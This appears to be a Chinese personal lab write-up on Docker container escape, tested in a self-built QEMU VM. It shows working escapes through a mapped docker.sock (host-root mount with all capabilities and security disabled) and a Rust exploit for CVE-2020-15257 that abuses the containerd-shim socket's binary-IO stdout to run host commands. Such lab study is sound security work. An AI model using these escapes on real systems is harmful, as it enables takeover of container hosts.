Docker 逃逸学习
环境搭建
打算使用虚拟机, 于是用 buildroot 搞了一个 rootfs, 以及一个默认的内核镜像. buildroot 可以直接选上 docker-cli 和 docker-engine (docker compose 的 checksum 好像有点问题, 改一下能用了, 反正虚拟机), 他会自动选上依赖. 内核可以用它提供的, 也可以自己编译或者下载其他内核. 这里以 buildroot/board/qemu/x86_64/linux.config
为基础进行修改.
docker 需要构建镜像需要网络, qemu 加入 -device virtio-net-pci,netdev=net0 -netdev user,id=net0,hostfwd=tcp::2222-:22
选项. DHCP 网络接口名 (BR2_SYSTEM_DHCP
) 设置成 eth0, 这样编译后生成的 inittab 有 dhcp 命令, 可以自动获取 ip. 还要把 ca-certificates 选上, 否则无法使用 https. 由于暂时 runc 暂时缺乏对 ramfs 的 pivot_root 支持 (见 rootfs: make pivot_root(2) dance handle initramfs case by cyphar · Pull Request #4434 · opencontainers/runc), 所以这里文件系统用 btrfs (我的机器内核没有 ext4 不好挂载修改). 此外, qmeu 的 tty 还是什么的当输出长度超过屏幕的时候并不会换行, 看输出比较困难, 于是装了一个 dropbear 来 ssh 进去 (所以上面映射了一下 22 端口).
最后目录格式如下:
.
├── buildroot
├── playground
├── disk.qcow2
└── Makefile
Makefile 内容如下:
IMAGES_DIR := $(shell pwd)/buildroot/output/images
ROOT_DIR := $(shell pwd)/playground
DISK_RAW := $(shell pwd)/disk.raw
DISK := $(shell pwd)/disk.qcow2
.PHONY: all clean world menuconfig cpio
all: world
linux-menuconfig:
$(MAKE) -C buildroot linux-menuconfig
# TODO: auto detect config file and copy it to buildroot/.linux.config
cp ./buildroot/output/build/linux-6.12.10/.config ./buildroot/.linux.config
disk:
rm -f $(DISK)
qemu-img create -f raw $(DISK_RAW) 1G
doas losetup /dev/loop1 $(DISK_RAW)
doas mkdir -p ./mnt/{disk,rootfs}
doas mount -o loop $(IMAGES_DIR)/rootfs.btrfs ./mnt/rootfs/
doas mkfs.btrfs /dev/loop1
doas mount /dev/loop1 ./mnt/disk
doas rsync -a ./mnt/rootfs/ ./mnt/disk/
cd ./mnt/disk && \
doas sed -i '$$a\root /root 9p trans=virtio,version=9p2000.L,rw 0 0' ./etc/fstab && \
echo "flag{escaped}" | doas tee ./flag && \
cd ..
doas umount ./mnt/disk
doas umount ./mnt/rootfs
doas losetup -d /dev/loop1
doas rm -r ./mnt
qemu-img convert -f raw -O qcow2 $(DISK_RAW) $(DISK)
rm $(DISK_RAW)
world:
$(MAKE) -C buildroot
$(MAKE) disk
menuconfig:
$(MAKE) -C buildroot menuconfig
clean:
$(MAKE) -C buildroot clean
run:
qemu-system-x86_64 \
-cpu qemu64,+smap \
-m 4096M \
-enable-kvm \
-kernel $(IMAGES_DIR)/bzImage \
-append "root=/dev/vda rw console=ttyS0 loglevel=3 oops=panic panic=-1" \
-nographic \
-no-reboot \
-device virtio-net-pci,netdev=net0 \
-netdev user,id=net0,hostfwd=tcp::2222-:22 \
-virtfs local,path=$(ROOT_DIR),mount_tag=root,security_model=mapped,id=root \
-drive file=$(DISK),format=qcow2,if=virtio,id=rootfs,index=0,media=disk
Mounted Socket
Docker 架构
容器是一个分离的架构, docker 命令只是前端, 真正负责管理容器的是守护进程 dockerd 和 containerd. 架构如下图所示:
graph TD A[Docker CLI] --> B["Dokcer Engine (dockerd)"] B --> C[containerd] C --> D[containerd-shim] D --> E[runC] C --> F[containerd-shim] F --> G[runC] C --> H[containerd-shim] H --> I[runC]
dockerd 实际调用的是 containerd 的 gRPC API, containerd 则管理容器的生命周期, 镜像, 存储, 网络等, containerd 才是容器的核型部分. 而 containerd-shim 是运行容器的载体, 每启动一个容器都会启动一个 containerd-shim 进程. 它负责使用 runC 的 API 来真正创建和运行容器.
docker run 的运行过程为:
- docker client 通过 gRPC 将指令传给 dockerd
- dockerd 请检查本机是否存在 docker 镜像文件,如果有继续往下执行, 向 host os 请求创建容器
- 启动 containerd-shim 进程, 创建 ns 和 cgroup
- containerd-shim 拿到三个参数 (容器 id, boundle 目录, 运行时二进制文件 runC) 来调用 runC 的 API
- runC 提取镜像文件, 生成容器配置文件, 然后启动容器
sequenceDiagram participant DOCKERD participant CONTAINERD participant CONTAINERD_SHIM participant RUNC DOCKERD->>CONTAINERD: GRPC 发送 REQUEST 请求 CONTAINERD->>CONTAINERD_SHIM: 调用 SHIM 进程 start/exec CONTAINERD_SHIM->>RUNC: 调用 RUNC 进程 create/start/exec RUNC-->>CONTAINERD_SHIM: CONTAINERD_SHIM-->>CONTAINERD: CONTAINERD-->>DOCKERD: GRPC 发送 RESPONSE CONTAINERD->>RUNC: RUNC 交互: 状态、TOP 等 RUNC-->>CONTAINERD: (我也不知道这里留空为什么会报错)
docker.sock
dockerd 默认绑定 unix socket /var/run/docker.sock
, 用他来进行通信. 在某些容器中管理 docker 的场景, 可能会将 socket 映射进去, 这样就可以在容器里操纵主机上的容器管理了.
写一个如下的 Dockerfile 和 compose:
FROM alpine:latest
RUN apk add --no-cache docker curlie
services:
app:
build: .
entrypoint: ["/bin/ash"]
stdin_open: true
tty: true
volumes:
- /var/run/docker.sock:/var/run/docker.sock
然后启动该容器, 进入容器内, 和往常一样使用 docker 命令即可操作主机的 docker daemon. 所以逃逸的手法是启动一个新的容器, 并且将主机目录映射进去, 就可以拿到 flag.
/ # docker run -it --rm -v /:/host/ alpine ash
/ # ls
bin etc host media opt root sbin sys usr
dev home lib mnt proc run srv tmp var
/ # cd /host
/host # ls
bin flag linuxrc proc sys
crond.reboot init media root tmp
dev lib mnt run usr
etc lib64 opt sbin var
/host # cat flag
flag{escaped}
不过实际上没有真的 “逃逸” 出去, ns 和 cgroup 隔离依然存在, 同时也受到 caps 限制. 不过由于可以直接使用 docker 命令, 所以在启动一个新的容器时可以进行设置, 使得容器使用主机的 ns 和 cgroup, 并且可以设置 apparmor 和 seccomp 等安全机制, 赋予更多 caps 等. 比如:
/ # docker run -it --rm -v /:/host/ --cap-add=ALL --security-opt apparmor=unconf
ined --security-opt seccomp=unconfined --security-opt label:disable --pid=host -
-userns=host --uts=host --cgroupns=host alpine ash
/ # ls
bin etc host media opt root sbin sys usr
dev home lib mnt proc run srv tmp var
/ # ps aux
PID USER TIME COMMAND
1 root 0:00 init
2 root 0:00 [kthreadd]
3 root 0:00 [pool_workqueue_]
4 root 0:00 [kworker/R-rcu_g]
5 root 0:00 [kworker/R-sync_]
6 root 0:00 [kworker/R-slub_]
7 root 0:00 [kworker/R-netns]
10 root 0:00 [kworker/0:0H-ev]
12 root 0:00 [kworker/R-mm_pe]
13 root 0:00 [rcu_tasks_kthre]
14 root 0:00 [ksoftirqd/0]
15 root 0:00 [rcu_preempt]
16 root 0:00 [rcu_exp_par_gp_]
17 root 0:00 [rcu_exp_gp_kthr]
18 root 0:00 [migration/0]
19 root 0:00 [cpuhp/0]
20 root 0:00 [kdevtmpfs]
21 root 0:00 [kworker/R-inet_]
22 root 0:00 [kauditd]
23 root 0:00 [kworker/u4:1-ev]
24 root 0:00 [oom_reaper]
25 root 0:00 [kworker/R-write]
26 root 0:00 [kcompactd0]
27 root 0:00 [kworker/R-kbloc]
28 root 0:00 [irq/9-acpi]
29 root 0:00 [kworker/R-ata_s]
30 root 0:00 [kworker/R-md]
31 root 0:00 [kworker/R-md_bi]
33 root 0:00 [kworker/0:1H-kb]
34 root 0:00 [kworker/R-rpcio]
35 root 0:00 [kworker/R-xprti]
36 root 0:00 [kworker/R-cfg80]
38 root 0:00 [kswapd0]
39 root 0:00 [kworker/R-nfsio]
40 root 0:00 [kworker/R-acpi_]
41 root 0:00 [scsi_eh_0]
42 root 0:00 [kworker/R-scsi_]
43 root 0:00 [scsi_eh_1]
44 root 0:00 [kworker/R-scsi_]
46 root 0:00 [kworker/R-mld]
47 root 0:00 [kworker/R-ipv6_]
57 root 0:00 [jbd2/vda-8]
58 root 0:00 [kworker/R-ext4-]
73 root 0:00 /sbin/syslogd -n
77 root 0:00 /sbin/klogd -n
165 root 0:00 udhcpc -t1 -A3 -b -R -O search -O staticroutes -p /var/run
170 root 0:00 /usr/sbin/crond -f
174 root 0:00 {dockerd-syslog-} /bin/sh /usr/libexec/dockerd-syslog-wrap
176 root 0:22 /usr/bin/dockerd --pidfile /var/run/dockerd.pid
177 root 0:00 {dockerd-syslog-} /bin/sh /usr/libexec/dockerd-syslog-wrap
187 root 0:05 containerd --config /var/run/docker/containerd/containerd.
924 root 0:00 -sh
1460 root 0:00 [kworker/0:0-eve]
2012 root 0:00 [kworker/u4:0-ev]
2634 root 0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id ec478
2667 root 0:00 /bin/ash
2696 root 0:00 docker compose run app
2708 root 0:01 /usr/lib/docker/cli-plugins/docker-compose compose run app
2737 root 0:02 /usr/bin/containerd-shim-runc-v2 -namespace moby -id c186f
2771 root 0:00 /bin/ash
2891 root 0:00 [kworker/u4:2-ev]
2908 root 0:00 [kworker/0:1-eve]
3047 root 0:00 [kworker/0:2-eve]
3093 root 0:00 docker run -it --rm -v /:/host/ --cap-add=ALL --security-o
3112 root 0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 795b7
3144 root 0:00 ash
3168 root 0:00 ps aux
这样就相当于获得了主机的所有权限了.
(不过更简单的方法是写 cron 反弹一个 shell 哈哈哈)
如果映射进来的 socket 不在默认位置, 可以使用 -H unix:///path/to/docker.sock
指定. (如果连名字也修改了那好像只能一个个文件试过去了.)
如果容器内没有 docker 命令也没有关系, 可以用其他方法去通信, 比如直接用 HTTP API.
/ # curlie --unix-socket /var/run/docker.sock GET http://localhost/containers/json
[
{
"Id": "6df5480c6d2ecd5ba05eee50e026e1d199560d30453a534e3b447a1ebc752bf6",
"Names": [
"/socket-app-run-ab55dc606bb9"
],
"Image": "alpine:latest",
"ImageID": "sha256:8a87ea05ce928fc576af504b9e838b12312274c4e39c7de784d30bc2
"Command": "/bin/ash",
"Created": 1736324068,
"Ports": [
],
"Labels": {
"com.docker.compose.config-hash": "1787a2ee9fcd2a21d4a5c22008bb8da1d54c
"com.docker.compose.container-number": "1",
"com.docker.compose.depends_on": "",
"com.docker.compose.image": "sha256:8a87ea05ce928fc576af504b9e838b12312
"com.docker.compose.oneoff": "True",
"com.docker.compose.project": "socket",
"com.docker.compose.project.config_files": "/root/socket/docker-compose
"com.docker.compose.project.working_dir": "/root/socket",
"com.docker.compose.service": "app",
"com.docker.compose.slug": "ab55dc606bb97468ca39af4bcfbabe3b54a63395d13
"com.docker.compose.version": "2.29.7"
},
"State": "running",
"Status": "Up About a minute",
"HostConfig": {
"NetworkMode": "socket_default"
},
"NetworkSettings": {
"Networks": {
"socket_default": {
"IPAMConfig": null,
"Links": null,
"Aliases": null,
"MacAddress": "02:42:ac:12:00:03",
"DriverOpts": null,
"NetworkID": "bb363fb6dc0ca84ea1859ec4c476f4c573008862d77378bc7
"EndpointID": "afa93e331bb45250fe7b5ef8931914ed2096a2c8a68c334e
"Gateway": "172.18.0.1",
"IPAddress": "172.18.0.3",
"IPPrefixLen": 16,
"IPv6Gateway": "",
"GlobalIPv6Address": "",
"GlobalIPv6PrefixLen": 0,
"DNSNames": null
}
}
},
"Mounts": [
{
"Type": "bind",
"Source": "/var/run/docker.sock",
"Destination": "/var/run/docker.sock",
"Mode": "rw",
"RW": true,
"Propagation": "rprivate"
}
]
},
{
"Id": "0d217c3631c47832c8391337670d1e0915057ea2ca910de3402620c2e2acbc26",
"Names": [
"/socket-app-1"
],
"Image": "alpine:latest",
"ImageID": "sha256:8a87ea05ce928fc576af504b9e838b12312274c4e39c7de784d30bc2
"Command": "/bin/ash",
"Created": 1736324010,
"Ports": [
],
"Labels": {
"com.docker.compose.config-hash": "07f59ca7fad1bdad505feb0e11fdd72aa356
"com.docker.compose.container-number": "1",
"com.docker.compose.depends_on": "",
"com.docker.compose.image": "sha256:8a87ea05ce928fc576af504b9e838b12312
"com.docker.compose.oneoff": "False",
"com.docker.compose.project": "socket",
"com.docker.compose.project.config_files": "/root/socket/docker-compose
"com.docker.compose.project.working_dir": "/root/socket",
"com.docker.compose.service": "app",
"com.docker.compose.version": "2.29.7"
},
"State": "running",
"Status": "Up About a minute",
"HostConfig": {
"NetworkMode": "socket_default"
},
"NetworkSettings": {
"Networks": {
"socket_default": {
"IPAMConfig": null,
"Links": null,
"Aliases": null,
"MacAddress": "02:42:ac:12:00:02",
"DriverOpts": null,
"NetworkID": "bb363fb6dc0ca84ea1859ec4c476f4c573008862d77378bc7
"EndpointID": "fdda29be5bab686b462f722fa82413c9a8aafb8457c2616c
"Gateway": "172.18.0.1",
"IPAddress": "172.18.0.2",
"IPPrefixLen": 16,
"IPv6Gateway": "",
"GlobalIPv6Address": "",
"GlobalIPv6PrefixLen": 0,
"DNSNames": null
}
}
},
"Mounts": [
{
"Type": "bind",
"Source": "/var/run/docker.sock",
"Destination": "/var/run/docker.sock",
"Mode": "rw",
"RW": true,
"Propagation": "rprivate"
}
]
}
]
HTTP/1.1 200 OK
Api-Version: 1.47
Content-Type: application/json
Docker-Experimental: false
Ostype: linux
Server: Docker/27.3.1 (linux)
Date: Wed, 08 Jan 2025 08:16:16 GMT
Transfer-Encoding: chunked
更多的操作可以对着 API 文档看, 就不试怎么启动容器什么的了.
port
在 systemd 启动的 docker 中, 还会将 docker.sock 绑定到 2375 (不加密) 和 2376 (tls) 端口, 如果容器能够访问主机网络 (-net=host
), 或者主机直接暴露到公网, 可以通过这个端口来操作, docker 命令的话和上面的类似, -H tcp://host:2376
即可连接.
containerd.sock
如果有映射进 containerd.sock, 也可以直接和他交互来创建容器进行逃逸. 可以使用 containerd 命令行 ctr, 也可以用其他工具比如更加友好的 nerdctl, 甚至可以自己写 gRPC 调用.
compose 如下:
services:
containerd:
build: .
entrypoint: ["/bin/ash"]
stdin_open: true
tty: true
cap_add:
- SYS_ADMIN
network_mode: host
volumes:
- /var/run/docker/containerd/containerd.sock:/var/run/docker/containerd/containerd.sock
- /var/lib/docker/containerd:/var/lib/docker/containerd
不过 docker 并不使用 contrainerd 存储容器 (参考), 所以 nerdctl 无法查看到 images. container 还是能够看到的, 不过在独立的 namespace 里:
/ # nerdctl -a /var/run/docker/containerd/containerd.sock namespace ls
NAME CONTAINERS IMAGES VOLUMES LABELS
default 0 0 0
moby 1 0 0
/ # nerdctl -a /var/run/docker/containerd/containerd.sock -n moby ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
50ed2f6cabbf "/bin/ash" 16 minutes ago Up
/ # docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
50ed2f6cabbf socket-app "/bin/ash" 16 minutes ago Up 16 minutes socket-app-run-5e4ecb87c5a0
可以成功拉取镜像, 但是创建容器还是会出现问题:
FATA[0000] failed to mount {Type:bind Source:/var/lib/docker/containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/4/fs Target: Options:[ro rbind]} on "/tmp/initialC2772891160": operation not permitted
这里需要给 mount 权限 (SYS_ADMIN capability), 并且将 /var/lib/docker/contaienrd/ 也映射进容器. (不懂为什么主机的 containerd 不在主机上找位置)
结果还是出现了问题:
FATA[0000] failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: failed to fulfil mount request: open /var/lib/nerdctl/55e780ce/containers/default/d832666b196df5a9dd64bd38453d590aa5e7b7464249e7092a41d665f55584b9/resolv.conf: no such file or directory: unknown
换成 ctr, 创建容器并启动:
/ # ctr -a /var/run/docker/containerd/containerd.sock container create --runtime io.containerd.runc.v2 --mount type=bind,source=/,destination=/host docker.io/library/alpine:latest test /bin/ash
/ # ctr -a /var/run/docker/containerd/containerd.sock task start test
ctr: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: error jailing process inside rootfs: pivot_root .: invalid argument: unknown
不能 pivot_root, 和 docker 一样的原因, 因为是 ramfs. 启动的时候带一个参数 –no-pivot:
/ # ctr -a /var/run/docker/containerd/containerd.sock task start --no-pivot test
ctr: failed to create shim task: failed to open stdin fifo /run/containerd/fifo/533476447/test-stdin: stat /run/containerd/fifo/533476447/test-stdin: no such file or directory: unknown
结果又无法操作 fifo 了. 这里倒是找到一个 wp 绕过了这个问题:
即不使用 stdin 交互而是弹一个 shell.
又出问题啦, 创建的时候可以 mount, 但是 task start 的时候报错, 不知道怎么解决了.
ctr: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: error mounting "/" to rootfs at "/host": mount src=/, dst=/host, dstFd=/proc/thread-self/fd/8: no such device: unknown
(人麻了, 开了个新机器只启动 containerd 也报这个错, 能搜到的接近的 issue 是 这个 但是他说不是 containerd 或者 runc 的问题)
暂时歇了, 能够控制其他容器也是一种逃逸 (确信)
containerd-shim.sock
有个 CVE-2020-15257 containerd-shim API exposed to host network containers · Advisory · containerd/containerd 和它相关. 这个漏洞是在旧版本的 containerd 中, 由于在 –net host 模式下, 容器与 host 共享一套 Network namespaces, 没有限制对抽象 Unix socket 的访问. 抽象 socket 并不受到 mount namespace 的隔离. 官方的修复方案是把原本的抽象 socket 替换成文件 socket, 这样这个 socket 就会受到 mount namespace 的隔离.
这里将 containerd-shim.sock 映射进容器来复现, compose 如下:
services:
shim:
imae: alpine:latest
entrypoint: ["/bin/ash"]
stdin_open: true
tty: true
volumes:
- /var/run/containerd/s/:var/run/containerd/s/
首先需要学习一下 containerd-shim 的交互方式. 使用 gRPC 与 shim 通信, API 如下:
service Task {
rpc State(StateRequest) returns (StateResponse);
rpc Create(CreateTaskRequest) returns (CreateTaskResponse);
rpc Start(StartRequest) returns (StartResponse);
rpc Delete(DeleteRequest) returns (DeleteResponse);
rpc Pids(PidsRequest) returns (PidsResponse);
rpc Pause(PauseRequest) returns (google.protobuf.Empty);
rpc Resume(ResumeRequest) returns (google.protobuf.Empty);
rpc Checkpoint(CheckpointTaskRequest) returns (google.protobuf.Empty);
rpc Kill(KillRequest) returns (google.protobuf.Empty);
rpc Exec(ExecProcessRequest) returns (google.protobuf.Empty);
rpc ResizePty(ResizePtyRequest) returns (google.protobuf.Empty);
rpc CloseIO(CloseIORequest) returns (google.protobuf.Empty);
rpc Update(UpdateTaskRequest) returns (google.protobuf.Empty);
rpc Wait(WaitRequest) returns (WaitResponse);
rpc Stats(StatsRequest) returns (StatsResponse);
rpc Connect(ConnectRequest) returns (ConnectResponse);
rpc Shutdown(ShutdownRequest) returns (google.protobuf.Empty);
}
可以使用 Pids 来测试一下. 官方提供了 go 语言的客户端 API, 不会写 go, 这里用 rust 来写.
PidsRequest 需要传入 id, 这里传入的是容器的 id (测试出来的, 应该是 docker 是这么组织管理的, 自己用 ctr 应该可以起不同的 id). 在容器里可以直接 cat /proc/self/cgroup
看到, 比如:
/ # cat /proc/self/cgroup
13:debug:/
12:misc:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
11:rdma:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
10:pids:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
9:hugetlb:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
8:net_prio:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
7:perf_event:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
6:net_cls:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
5:freezer:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
4:devices:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
3:blkio:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
2:cpuacct:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
1:cpu:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
use std::fs;
use containerd_shim_protos::{
api::PidsRequest,
ttrpc::context::{self, Context},
Client, TaskClient,
};
fn find_shim_sockets() -> Vec<String> {
fs::read_dir("/run/containerd/s/")
.expect("Failed to read /run/containerd/s/")
.filter_map(|entry| entry.ok())
.map(|entry| entry.path().to_string_lossy().to_string())
.collect()
}
fn get_container_id() -> Result<String, std::io::Error> {
let cgroup = fs::read_to_string("/proc/1/cgroup").expect("Failed to read /proc/1/cgroup");
for line in cgroup.lines() {
if line.contains("docker") {
let parts: Vec<&str> = line.split('/').collect();
return parts
.last()
.map(|s| s.to_string())
.ok_or(std::io::Error::new(
std::io::ErrorKind::NotFound, line));
}
}
Err(std::io::Error::new(std::io::ErrorKind::NotFound, cgroup))
}
fn main() {
for socket in find_shim_sockets() {
let sockaddr = format!("unix://{socket}");
println!("connecting to {}", sockaddr);
let client = Client::connect(&sockaddr).expect("Failed to connect to shim");
let task = TaskClient::new(client);
println!("requesting pids for {}", socket);
let container_id = get_container_id().expect("Failed to get container id");
let mut pids_req = PidsRequest::new();
pids_req.set_id(container_id);
let pids_resp = task
.pids(context::with_timeout(0), &pids_req)
.expect("Failed to get pids");
println!("pids: {:#?}", pids_resp);
}
}
结果如下:
connecting to unix:///run/containerd/s/ddb23e1e1b639b0cc4a313a92f318ccbc7c0ef9c4b77bbe99a806b523172733c
requesting pids for /run/containerd/s/ddb23e1e1b639b0cc4a313a92f318ccbc7c0ef9c4b77bbe99a806b523172733c
pids: PidsResponse {
processes: [
ProcessInfo {
pid: 682,
info: MessageField(
None,
),
special_fields: SpecialFields {
unknown_fields: UnknownFields {
fields: None,
},
cached_size: CachedSize {
size: 0,
},
},
},
ProcessInfo {
pid: 939,
info: MessageField(
None,
),
special_fields: SpecialFields {
unknown_fields: UnknownFields {
fields: None,
},
cached_size: CachedSize {
size: 0,
},
},
},
],
special_fields: SpecialFields {
unknown_fields: UnknownFields {
fields: None,
},
cached_size: CachedSize {
size: 0,
},
},
}
成功连上 host 的 shim socket 并且通信. 在主机上可以看到, 上面的 682
是 docker 中的进程 (这里启动的是 ash), 其父进程是 containerd-shim
:
# ps -o pid,ppid,args | grep -E "PID|$(ps -o pid,ppid,args | grep 682 | head -n -1 | awk '{print $2}')"
PID PPID COMMAND
650 1 /usr/bin/containerd-shim-runc-v2 -namespace moby -id c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071 -address /var/run/docker/containerd/containerd.sock
682 650 /bin/ash
接下来考虑利用. 在运行一个 task 时, 有两个地方可以直接执行主机命令. 一个是 IO 可以指定成程序, 另一个是设置 hooks 运行程序.
IO
containerd 支持将 IO 设置成二进制程序, 来做到类似重定向的效果. 比如可以将容器的输出记录到日志程序如 journald 中. 相关代码 如下:
// BinaryIO forwards container STDOUT|STDERR directly to a logging binary
func BinaryIO(binary string, args map[string]string) Creator {
return func(_ string) (IO, error) {
uri, err := LogURIGenerator("binary", binary, args)
if err != nil {
return nil, err
}
res := uri.String()
return &logURI{
config: Config{
Stdout: res,
Stderr: res,
},
}, nil
}
}
所以可以创建一个 task, 并且设置其 stdout 为 binaryio, 这样就可以在主机上执行任意命令了, 比如反弹 shell.
先来看看创建 task 需要的参数:
message CreateTaskRequest {
string id = 1;
string bundle = 2;
repeated containerd.types.Mount rootfs = 3;
bool terminal = 4;
string stdin = 5;
string stdout = 6;
string stderr = 7;
string checkpoint = 8;
string parent_checkpoint = 9;
google.protobuf.Any options = 10;
}
根据 OCI, id, bundle 是必要的, id 则是上面说到的那个 id, bundle 则是容器的配置文件, 符合 OCI 标准. 其他留空的话会按 bundle 设置的来. id 可以自行设置. bundle 如果直接用 docker 启动时设置的 (/run/docker/containerd/daemon/io.containerd.runtime.v2.task/moby/{container_id}/config.json
) 目前版本会出现如下报错:
Failed to create task: RpcStatus(Status { code: UNKNOWN, message: "OCI runtime create failed: runc create failed: container's cgroup is not empty: 2 process(es) found", details: [], special_fields: SpecialFields { unknown_fields: UnknownFields { fields: None }, cached_size: CachedSize { size: 0 } } })
说是 cgroup 不为空, 所以还得自己设置. 主机是可以访问容器的文件系统的, 所以可以在容器文件系统中写一个 bundle 文件. 具体来说, docker 默认使用 overlayfs, 在容器中查看 /etc/mtab
即可查看 rootfs 映射, 比如:
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/OZM73XA67KI3RI5ZIOLNDRSAYH:/var/lib/docker/overlay2/l/CFJLUZAW4E44SPONRAFFOYETHV:/var/lib/docker/overlay2/l/UKJT4TRNQILRFI44Y4LLNH7BOK,upperdir=/var/lib/docker/overlay2/42e61d37a5c08ecbb4a9fc4385d4f0cbec3cddb6f5e1e9959a92e02d409a22c8/diff,workdir=/var/lib/docker/overlay2/42e61d37a5c08ecbb4a9fc4385d4f0cbec3cddb6f5e1e9959a92e02d409a22c8/work 0 0
overlayfs 分层, 这里访问 /var/lib/docker/overlay2/{overlay_id}/merged
即可访问到容器的 rootfs. 或者用 diff 也行, diff 会存新加/修改的.
将已有容器的 config.json
拿出来修改, 把 container id 和 root path 修改正确, 把 cgroupPath 写成别的什么路径, 最后写入比如容器中的 /tmp/config.json
里, 这样主机上的 bundle 路径应该是 /var/lib/docker/overlay2/{overlay_id}/merged/tmp/
.
不出意外的话就要出意外了, 报错:
Failed to create task: RpcStatus(Status { code: UNKNOWN, message: "OCI runtime create failed: runc create failed: cannot allocate tty if runc will detach without setting console socket", details: [], special_fields: SpecialFields { unknown_fields: UnknownFields { fields: None }, cached_size: CachedSize { size: 0 } } })
这里需要把请求中 terminal
选项写成 true, 就不会认为是 detach, 不用创建 socket.
这里使用主机上的 docker cp 把 /flag 拷贝进来打. exp 如下:
use std::{fs, path::Path};
use containerd_shim_protos::{
api::{CreateTaskRequest, CreateTaskResponse, PidsRequest, PidsResponse},
protobuf::{self, Message, MessageDyn},
shim::oci::Options,
ttrpc::context::{self, Context},
Client, TaskClient,
};
fn find_shim_sockets() -> Vec<String> {
fs::read_dir("/run/containerd/s/")
.expect("Failed to read /run/containerd/s/")
.filter_map(|entry| entry.ok())
.map(|entry| entry.path().to_string_lossy().to_string())
.collect()
}
fn get_container_id() -> String {
let cgroup = fs::read_to_string("/proc/1/cgroup").expect("Failed to read /proc/1/cgroup");
for line in cgroup.lines() {
if line.contains("docker") {
let parts: Vec<&str> = line.split('/').collect();
return parts
.last()
.expect("Failed to get last part of cgroup line")
.to_string();
}
}
panic!("Failed to find container id in /proc/1/cgroup: {}", cgroup);
}
fn get_overlayfs() -> String {
fs::read_to_string("/etc/mtab")
.expect("Failed to read /etc/mtab")
.lines()
.next()
.expect("Failed to get first line of /etc/mtab")
.split(',')
.find(|part| part.contains("workdir="))
.expect("Failed to find overlayfs workdir")
.split_whitespace()
.next()
.expect("Failed to get overlayfs workdir")
.split('=')
.last()
.expect("Failed to get overlayfs workdir")
.replace("work", "merged")
}
fn get_overlay_id() -> String {
let overlay_path = get_overlayfs();
overlay_path
.split('/')
.nth_back(1)
.expect("Failed to get last part of overlayfs path")
.to_string()
}
fn main() {
for socket in find_shim_sockets() {
let sockaddr = format!("unix://{socket}");
println!("connecting to {}", sockaddr);
let client = Client::connect(&sockaddr).expect("Failed to connect to shim");
let task = TaskClient::new(client);
let create_resp = create_task_request(&task);
println!("created task: {:#?}", create_resp);
}
}
fn set_bundle<P: AsRef<Path>, Q: AsRef<Path>>(overlayfs_path: P, inner_path: Q) -> String {
let config_template = include_str!("config.json");
let config = config_template
.replace("{{OVERLAY_ID}}", &get_overlay_id())
.replace("{{CONTAINER_ID}}", &get_container_id());
let config_path = Path::new("/").join(&inner_path).join("config.json");
fs::write(&config_path, config)
.unwrap_or_else(|_| panic!("Failed to write {}", config_path.display()));
let bundle_path = overlayfs_path.as_ref().join(inner_path);
bundle_path.to_string_lossy().into_owned()
}
fn create_task_request(task: &TaskClient) -> CreateTaskResponse {
let mut create_req = CreateTaskRequest::new();
create_req.set_id("PwnedByWings".to_string());
create_req.set_terminal(true);
let bundle_path = set_bundle(get_overlayfs(), "tmp/");
create_req.set_bundle(bundle_path);
let command = format!("docker cp /flag {}:/", get_container_id());
let command = command.replace(" ", "%20");
let payload = format!("binary:///bin/sh?-c={command}");
create_req.set_stdout(payload);
task.create(context::with_timeout(0), &create_req)
.expect("Failed to create task")
}
结果如下:
/ # ls
bin etc home media opt root sbin sys usr
dev exp lib mnt proc run srv tmp var
/ # ./exp
connecting to unix:///run/containerd/s/88552ed7ac5fb857627ffeabe8b98d2197fda3d27779ff5cc0febdb6d728dc17
created task: CreateTaskResponse {
pid: 660,
special_fields: SpecialFields {
unknown_fields: UnknownFields {
fields: None,
},
cached_size: CachedSize {
size: 0,
},
},
}
/ # ls
bin etc flag lib mnt proc run srv tmp var
dev exp home media opt root sbin sys usr
/ # cat flag
flag{escaped}
(大半年就搞了这么点, 暂时搁置了)